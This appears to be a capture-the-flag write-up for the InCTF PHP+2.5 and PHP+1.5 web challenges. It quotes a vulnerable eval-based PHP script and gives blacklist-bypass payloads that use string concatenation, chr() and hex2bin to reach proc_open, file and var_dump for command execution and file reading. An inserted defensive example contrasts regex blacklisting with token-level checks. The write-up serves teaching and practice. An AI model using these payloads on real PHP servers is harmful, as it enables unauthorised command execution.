ふるつき

v(*'='*)v crab

InCTF Writeup

I played InCTF as a member of zer0pts. We reached 22nd place with 2302 points. It was a very good CTF. Thanks to all the admins for holding such a great competition!

I solved PHP+1.5 and PHP+2.5 during the competition. Here are the writeups.

[Web 744points] PHP+2.5

The given URL evaluated our PHP code. There were some restrictions: the code could not contain the name of any defined internal function or certain symbols and language constructs, and it had to be shorter than 100 bytes. For details, see the following script.

<?php

$input = $_GET['input'];

function check(){
  global $input;
  foreach (get_defined_functions()['internal'] as $blacklisted) {
      if (preg_match ('/' . $blacklisted . '/im', $input)) {
          echo "Your input is blacklisted" . "<br>";
          return true;
          break;
      }
  }
  $blacklist = "exit|die|eval|\[|\]|\\\|\*|`|-|\+|~|\{|\}|\"|\'";
  if(preg_match("/$blacklist/i", $input)){
    echo "Do you really you need that?" . "<br>";
    return true;
  }

  unset($blacklist);
  if(strlen($input)>100){  #That is random no. I took ;)
    echo "This is getting really large input..." . "<br>";
    return true;
  }  
  return false;
}

$thisfille=$_GET['thisfile'];

if(is_file($thisfille)){
  echo "You can't use inner file" . "<br>";
}
else{
  if(file_exists($thisfille)){
    if(check()){
      echo "Naaah" . "<br>";
    }else{
      eval($input);
    }
  }else{
    echo "File doesn't exist" . "<br>";
  }

}

function iterate($ass){
    foreach($ass as $hole){
        echo "AssHole";
    }
}

highlight_file(__FILE__);
?>

At first, I displayed phpinfo with this payload: ?thisfile=/&input=$x=php.info;$x();. Because PHP treats an undefined constant (a bare identifier) as a string and supports variable functions, php.info evaluates to the string "phpinfo" and $x() calls phpinfo().
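To see why this slips past check(), here is an added example (my own code, not part of the writeup or the challenge source) that runs the same per-function-name regex the challenge uses against the phpinfo payload, and next to it a token-level check that parses the input with token_get_all() and flags bare identifiers and variable-function calls. It assumes PHP 7.x semantics, where an undefined constant is coerced to a string (PHP 8 throws an Error instead); the second input is a constructed benign assignment for contrast.

```php
<?php
// Added example (not part of the original writeup or the challenge source).
// Contrasts the challenge's regex name blacklist with a token-level check.
// Assumes PHP 7.x semantics: an undefined constant such as `php` is silently
// coerced to the string "php" (PHP 8 raises an Error at runtime instead).

// Mirrors check() from the challenge: every internal function name is used
// as a regex against the raw input. Returns the names that matched.
function regex_blacklist_hits(string $input): array
{
    $hits = [];
    foreach (get_defined_functions()['internal'] as $name) {
        // preg_quote changes nothing for plain function names; added for hygiene.
        if (preg_match('/' . preg_quote($name, '/') . '/im', $input)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Token-level check: parse the input as PHP and report anything that can end
// up calling a function, regardless of how the callee name is spelled.
function token_check_flags(string $input): array
{
    $reasons = [];
    $tokens  = token_get_all('<?php ' . $input);
    $n       = count($tokens);

    for ($i = 0; $i < $n; $i++) {
        $t = $tokens[$i];

        // A bare identifier. In PHP 7 an undefined constant becomes a string,
        // so `php.info` evaluates to "phpinfo" without ever spelling it out.
        // (true/false/null also tokenize as T_STRING; a real policy would
        // allowlist those three.)
        if (is_array($t) && $t[0] === T_STRING) {
            $reasons[] = 'bare identifier ' . $t[1];
        }

        // "(" directly after a variable is a variable-function call: $x(...).
        if ($t === '(') {
            $j = $i - 1;
            while ($j >= 0 && is_array($tokens[$j]) && $tokens[$j][0] === T_WHITESPACE) {
                $j--;
            }
            if ($j >= 0 && is_array($tokens[$j]) && $tokens[$j][0] === T_VARIABLE) {
                $reasons[] = 'variable function call ' . $tokens[$j][1] . '(...)';
            }
        }
    }
    return $reasons;
}

// Inputs under test: the phpinfo payload quoted in the writeup and a
// constructed benign assignment for contrast.
$inputs = [
    'writeup payload'      => '$x=php.info;$x();',
    'benign (constructed)' => '$a = 1;',
];

foreach ($inputs as $label => $code) {
    printf("%s: %s\n", $label, $code);
    printf("  regex blacklist hits : %s\n", json_encode(regex_blacklist_hits($code)));
    printf("  token-level findings : %s\n", json_encode(token_check_flags($code)));
}
```

On the challenge's PHP build the payload produced no regex hits (which is why it was accepted), while the token-level check reports the bare identifiers php and info and the $x(...) call; the benign assignment is flagged by neither. The point for a defender is that a substring blacklist inspects spelling, whereas the language only cares about what the expression evaluates to, so the robust fix is to not eval() untrusted input at all rather than to grow the blacklist.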

From the phpinfo output I found that some functions that execute commands or read from and write to files were disabled. However, proc_open and file were still enabled, so we could still execute arbitrary commands and read arbitrary files.

While globbing the root directory (payload: /?thisfile=/&input=$x=ch.r;$d=va.$x(114).$x(95).dump;$g=glo.b;$d($g($x(47).$x(42)));), I found a /readFile executable. That was the file to execute.

I used chr, proc_open, hex2bin, file, and var_dump to get the flag: run /readFile>/tmp/x with proc_open, then read the output with file and print it with var_dump. My payloads are here.

  1. do proc_open("/r*>/tmp/x",[],$z);: ?thisfile=/&input=$x=c.hr;$f=proc.$x(95).open;$g=hex.$x(50).bin;$f($g($x(50).f722a3e2f746d702f78),array(),$z);
  2. do var_dump(file("/tmp/x"));: ?thisfile=/&input=$x=c.hr;$f=va.$x(114).$x(95).dump;$g=fil.e;$a=$x(47).tmp.$x(47).x;$f($g($a));

Got the result! FLAG: inctf{Getting_segmentation_fault is_fun}

Unintended solution :P

[Web 100points] PHP+1.5

Same as PHP+2.5.